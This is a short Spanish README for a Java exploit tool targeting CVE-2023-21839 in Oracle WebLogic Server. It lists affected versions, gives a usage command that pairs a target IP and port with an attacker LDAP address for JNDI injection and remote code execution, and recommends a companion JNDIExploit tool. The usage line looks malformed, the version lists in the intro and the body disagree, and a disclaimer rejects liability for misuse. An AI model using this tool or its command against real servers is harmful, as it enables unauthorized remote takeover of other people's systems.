
Exploit basado en Java para CVE-2023-21839 dirigido a Oracle WebLogic Server versiones 12.2.1.3.0 y 12.2.1.4.0 mediante inyección LDAP para ejecución remota de código.
CVE-2023-21839, una herramienta creada a partir del PoC público de la red.
Versiones afectadas
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Método de uso
java -jar ip_objetivo:puerto dirección_ldap
Herramienta recomendada:
https://github.com/WhiteHSBG/JNDIExploit
Esta herramienta es únicamente para la investigación y el intercambio en seguridad ofensiva y defensiva de redes. ¡Los usuarios deben utilizarla de manera razonable conforme a la Ley de Seguridad Cibernética!
Si el usuario utiliza esta herramienta para llevar a cabo cualquier acto ilegal, como ataques ilegales, el autor no se hace responsable.